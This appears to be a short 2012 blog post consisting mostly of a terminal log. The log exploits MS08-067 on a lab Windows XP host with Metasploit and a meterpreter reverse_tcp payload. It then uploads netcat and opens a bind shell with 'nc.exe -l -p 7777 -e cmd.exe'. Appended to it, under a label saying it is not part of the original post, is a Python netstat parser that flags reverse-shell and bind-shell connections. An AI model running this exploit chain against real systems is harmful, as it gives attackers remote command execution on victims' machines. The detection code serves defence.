Tuesday, January 31, 2012

Metasploit with Netcat


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.56.2
RHOST => 192.168.56.2
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.2     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.2:1038) at 2011-07-03 00:45:42 +0700


meterpreter > upload /root/Desktop/nc.exe c:\\
[*] uploading  : /root/Desktop/nc.exe -> c:\
[*] uploaded   : /root/Desktop/nc.exe -> c:\\nc.exe
meterpreter > shell
Process 576 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>cls
cls


C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 78F1-F486

 Directory of C:\

06/26/2011  12:49 AM                 0 AUTOEXEC.BAT
06/26/2011  12:49 AM                 0 CONFIG.SYS
06/26/2011  05:45 PM    <DIR>          Documents and Settings
07/03/2011  01:19 AM            59,392 nc.exe
06/26/2011  01:01 AM    <DIR>          Program Files
06/29/2011  03:31 AM    <DIR>          rain
06/29/2011  03:33 AM    <DIR>          uun
06/29/2011  12:49 AM    <DIR>          WINDOWS
               3 File(s)         59,392 bytes
               5 Dir(s)   3,695,656,960 bytes free

C:\>nc.exe
nc.exe
Cmd line:
no port[s] to connect to

C:\>nc.exe -l -p 7777 -e cmd.exe
nc.exe -l -p 7777 -e cmd.exe

[root@Novemberain][~]
[#] nc 192.168.56.2 7777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

C:\>netstat -an
netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.56.2:139       0.0.0.0:0              LISTENING
  TCP    192.168.56.2:1034      192.168.56.1:4444      CLOSE_WAIT
  TCP    192.168.56.2:7777      192.168.56.1:47816     ESTABLISHED
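The `netstat -an` listing above is exactly the artifact a responder would use to spot the netcat listener on port 7777 and the stale reverse connection to port 4444. As an added example that is not part of the original post, the following Python parses such output against an assumed service baseline for this lab host (the baseline port sets are assumptions) and flags endpoints that fall outside it:

```python
import re
from collections import namedtuple
# Constructed sample input: the `netstat -an` listing shown in the post.
SAMPLE_NETSTAT = """
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.56.2:139       0.0.0.0:0              LISTENING
  TCP    192.168.56.2:1034      192.168.56.1:4444      CLOSE_WAIT
  TCP    192.168.56.2:7777      192.168.56.1:47816     ESTABLISHED
"""

# Assumed baseline for this lab host (a real one comes from asset inventory):
# services it should expose, and remote ports it is expected to reach out to.
EXPECTED_LISTENERS = {23, 135, 139, 445}
EXPECTED_REMOTE_PORTS = {53, 80, 443}
XP_EPHEMERAL = range(1025, 5001)  # default client-port range on XP/2003
Conn = namedtuple("Conn", "proto local_ip local_port remote_ip remote_port state")
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)\s*(\S*)\s*$")

def parse_netstat(text):
    """Return one Conn per data row; header and blank rows are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            proto, lip, lport, rip, rport, state = m.groups()
            rport = int(rport) if rport.isdigit() else None  # UDP rows show *:*
            conns.append(Conn(proto, lip, int(lport), rip, rport, state))
    return conns

def flag_suspicious(conns):
    """Return (Conn, reason) pairs for TCP endpoints outside the baseline."""
    findings = []
    for c in conns:
        if c.proto != "TCP" or c.local_port in EXPECTED_LISTENERS:
            continue  # a known service, whether idle or serving a client
        if c.state == "LISTENING":
            if c.local_ip != "127.0.0.1":  # loopback-only listeners are not network-reachable
                findings.append((c, "unexpected network listener on port %d" % c.local_port))
        elif c.remote_port not in EXPECTED_REMOTE_PORTS:
            if c.local_port in XP_EPHEMERAL:  # we dialed out: local port is a client port
                findings.append((c, "outbound session to unexpected remote port %d (reverse-shell pattern)" % c.remote_port))
            else:  # peer dialed in to a port we are not supposed to serve
                findings.append((c, "inbound session on unexpected local port %d (bind-shell pattern)" % c.local_port))
    return findings
```

Run against the listing, it reports two findings: the 1034 to 4444 session as an outbound reverse-shell pattern and the 7777 session as an inbound bind-shell pattern, while the loopback RPC listener on 1026 is left alone.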

